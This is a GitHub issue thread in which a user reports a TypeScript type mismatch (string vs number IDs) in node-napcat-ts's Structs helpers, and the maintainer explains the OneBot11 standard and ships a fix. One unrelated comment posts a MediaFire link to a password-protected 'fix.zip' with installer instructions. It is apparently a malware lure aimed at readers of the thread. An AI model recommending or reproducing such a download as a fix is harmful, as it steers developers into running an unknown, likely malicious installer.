### ISSUE TITLE
Structs  类型可能有问题

### ISSUE THREAD

**Issue by ry0513** [huankong233/node-napcat-ts#29]
我想实现的场景是 当收到群里消息时，回复消息时 引用消息并@发言人，

我的代码是
```ts
 bot.on("message.group", async function (context) {
    await bot.send_msg({
      group_id: context.group_id,
      message: [
        Structs.at(context.user_id),
        Structs.reply(context.message_id),
        Structs.text(" 抱歉，你说的东西我不懂哦~"),
      ],
    });
  });
```
但是类型检测报错
![QQ20240826-225245](https://github.com/user-attachments/assets/3473b861-180b-4b00-9056-59eb36a2d4bc)

Structs.d.ts 中
![image](https://github.com/user-attachments/assets/e704f555-1fe7-45b7-b88d-746386ee47f6)
 
文档中相关类型也为 number 类型，Structs.d.ts 标识的类型是否有误
![image](https://github.com/user-attachments/assets/33b25d00-bcdd-4935-9fad-74b3a097ff66)

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by huankong233** [comment]
> 我想实现的场景是 当收到群里消息时，回复消息时 引用消息并@发言人，
> 
> 我的代码是
> 
> ```ts
>  bot.on("message.group", async function (context) {
>     await bot.send_msg({
>       group_id: context.group_id,
>       message: [
>         Structs.at(context.user_id),
>         Structs.reply(context.message_id),
>         Structs.text(" 抱歉，你说的东西我不懂哦~"),
>       ],
>     });
>   });
> ```
> 
> 但是类型检测报错 ![QQ20240826-225245](https://private-user-images.githubusercontent.com/44745967/361476878-3473b861-180b-4b00-9056-59eb36a2d4bc.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2ODg3NjEsIm5iZiI6MTcyNDY4ODQ2MSwicGF0aCI6Ii80NDc0NTk2Ny8zNjE0NzY4NzgtMzQ3M2I4NjEtMTgwYi00YjAwLTkwNTYtNTllYjM2YTJkNGJjLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE2MDc0MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQ4N2UzYjQ1MmYwOGYzYjQxNjQxYzEwY2FiM2IzMzAxNDYyNWM0ZDIxZGVmNTQyOWE1ZDIwNDAxNTBjMmJjNDMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.KJV1xMfLsMoMxC-2bdx0eXtmEUSDI3pSL5rnTG3dkQ4)
> 
> Structs.d.ts 中 ![image](https://private-user-images.githubusercontent.com/44745967/361477950-e704f555-1fe7-45b7-b88d-746386ee47f6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2ODg3NjEsIm5iZiI6MTcyNDY4ODQ2MSwicGF0aCI6Ii80NDc0NTk2Ny8zNjE0Nzc5NTAtZTcwNGY1NTUtMWZlNy00NWI3LWI4OGQtNzQ2Mzg2ZWU0N2Y2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE2MDc0MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTYxOGYxNWU2Y2Y3MTIwNGEwNWViOGI0MmU5ZDQ2OWM2ZjVkNTlhNDI4ZDFiMDJmOTA1ZTFkODE3ODU3ODNhM2EmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.tApPzrM13uPG_OAafy0T7SmyiOLx0GEEVx03ahc_d24)
> 
> 文档中相关类型也为 number 类型，Structs.d.ts 标识的类型是否有误 ![image](https://private-user-images.githubusercontent.com/44745967/361479828-33b25d00-bcdd-4935-9fad-74b3a097ff66.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2ODg3NjEsIm5iZiI6MTcyNDY4ODQ2MSwicGF0aCI6Ii80NDc0NTk2Ny8zNjE0Nzk4MjgtMzNiMjVkMDAtYmNkZC00OTM1LTlmYWQtNzRiM2EwOTdmZjY2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE2MDc0MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTdiMDhhYWZlNGMyYTJhZTJhNjc1MjE5NGUyNDgwNjgzZmFiODBmMjM1OTRhOTE0ZTNkYjZlNDM0MThhNGJjZjImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.F9wfrfM2bz1AKFCmlyZYoBrx6i4Z54Fp1upTFNkSXos)

应该是我遗漏了，这里按道理我觉得应该是跟随收到的数据为 `number`, 但是 `onebot11` 标准中，消息段所有字段都为 `string`, 所以就改掉了

**Comment by huankong233** [comment]
我还在考虑这个应该灵活一些还是完全按照标准来，你觉得呢

**Comment by huankong233** [comment]
> > 我还在考虑这个应该灵活一些还是遵循标准来，你觉得完全呢
> 
> 这里传递的 id 为 `number`，构建消息内容是使用 `string` 我感觉不太方便 ![image](https://private-user-images.githubusercontent.com/44745967/361504996-d65bd1b9-45f9-484d-9d23-ec5f2bec8c98.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2OTA2MDksIm5iZiI6MTcyNDY5MDMwOSwicGF0aCI6Ii80NDc0NTk2Ny8zNjE1MDQ5OTYtZDY1YmQxYjktNDVmOS00ODRkLTlkMjMtZWM1ZjJiZWM4Yzk4LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE2MzgyOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWM5NzYzOTMxM2IzNzA0MzE1YTYzNWFhNWUyODI3YmM4YmMyM2Y4MzliMTUxNThjZjg3NzZiNGU3YmVmYjBlYjgmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.M9PgwNsk9VfLsC1vsrryhSKXcNIeKp-C6ntIFujWiHQ)
> 
> 我写的话，我感觉我会类似于 oicq 库，把 `number` , `string` , `all`都写进来, 下图是 oicq 库的 at 类型 ![image](https://private-user-images.githubusercontent.com/44745967/361503049-2756f3c1-db54-45a7-b004-b6bd87303296.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2OTA2MDksIm5iZiI6MTcyNDY5MDMwOSwicGF0aCI6Ii80NDc0NTk2Ny8zNjE1MDMwNDktMjc1NmYzYzEtZGI1NC00NWE3LWIwMDQtYjZiZDg3MzAzMjk2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE2MzgyOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWI3OWNhZmY5MjA0YmEwYzQwMTYzNDQxYzdhNmVlNWY4YTZjMjk4ZWNhYTMxMTJiZDM5NzU4ZGQ5MGFhYTA4N2EmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.ixXz-yT0HuPb4_OTSZ71hc49TBaevGXzwj1Nmzpwsaw)

明天我修改一下，上床了🤗

**Comment by huankong233** [comment]
已更新 #30
